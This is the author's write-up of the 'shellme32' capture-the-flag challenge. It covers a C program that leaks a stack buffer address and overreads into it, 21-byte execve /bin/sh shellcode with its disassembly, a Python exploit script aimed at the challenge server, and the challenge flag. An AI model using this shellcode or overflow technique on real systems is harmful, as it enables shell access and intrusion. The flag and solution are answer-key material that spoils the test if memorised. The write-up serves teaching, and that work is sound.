# Shellme32 Author Writeup

## Description

A hacker's first always bring me to tears.

*Hint:* Have you checked the memory permissions?

## A Word From The Author

Shellcode is fun, but it can fail for pretty unknown reasons (at least unkown to me). The point of this challenge, and it's parter in crime: shellme64, is to get people comfortable/familiar with shellcode execution and hopefully find some shellcode they like.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	char username[32];
	printf("Shellcode... Can you say shellcode?\n%p\n> ", username);
	read(0, username, 64);


    return 0;
}
```

![info.png](./res/f3366b9490c44d44a169c895b8b4032f.png)

No mystery her, this challenge isn't intended to have any tricks.

The only question now is what shellcode to use. [Shell Storm](http://shell-storm.org/shellcode/) and [Exploit DB](https://www.exploit-db.com/shellcodes) have some great shellcode, but not all shellcode is made equal. First off, the shellcode you probably want is an `execve /bin/sh` shellcode, this way the process you are connected to will spawn a shell you can interact with since Socat is passing stdin/stdout to the socket connection. It's common for shellcode to be made specifically for a need. In the rare case in which an attacker would get a chance to inject shellcode, they may have only a few bytes to work with so they must make the best of it. Although there is shellcode that is small that will configure the environment exactly as it's needed, there is lots of sloppy shellcode out there. Personally, this 32bit shellcode has never steered me wrong:

### Shellcode

* [shellstorm](http./res//shell-storm.org/shellcode/files/shellcode-841.php.png)
* Bytes: 21

```sh
\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
```

``` assembly
0:  31 c9                   xor    ecx,ecx
2:  f7 e1                   mul    ecx
4:  b0 0b                   mov    al,0xb
6:  51                      push   ecx
7:  68 2f 2f 73 68          push   0x68732f2f
c:  68 2f 62 69 6e          push   0x6e69622f
11: 89 e3                   mov    ebx,esp
13: cd 80                   int    0x80
```

Let's throw it in a script and see what we get. Since the program will output the address of the buffer you are writing into, no leaking is necessary.

### Important Syscalls

Just for references sake, here's a list of important syscalls and the register configurations:

| eax  | System Call |      ebx       |     ecx      |  edx   | esi  | edi  |
| --- | ----------- | ------------- | ------------ | ------ | --- | --- |
| 1   | sys_exit   | int            |              |        |     |     |
| 3   | sys_read   | unsigned int   | char *       | size_t |     |     |
| 4   | sys_write  | unsigned int   | const char * | size_t |     |     |
| 5   | sys_open   | const char *   | int          | int    |     |     |
| 6  | sys_close  | unsigned int  |   |   |   |   |
| 11  | sys_execve | struct pt_regs |              |        |     |     |


## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30506',
    localcmd =  './shellme32',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
    pause =     True,
    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
pad = 44-4

p.recvuntil('\n')
stack = flat(int(p.recv(10), 16))
p.recv()

sc = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"

payload = sc
payload += 'A'*(pad-len(payload))
payload += stack

p.send(payload)
p.interactive()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![exploit.png](./res/f1d862426ece4934a61cba275b02c02b.png)


## Endgame

64bit shellcode differs enough from 32bit to matter which is why shellme64 is just a reskinned challenge with more bytes.

> **flag:** TUCTF{4www..._b4by5_f1r57_3xpl017._h0w_cu73}

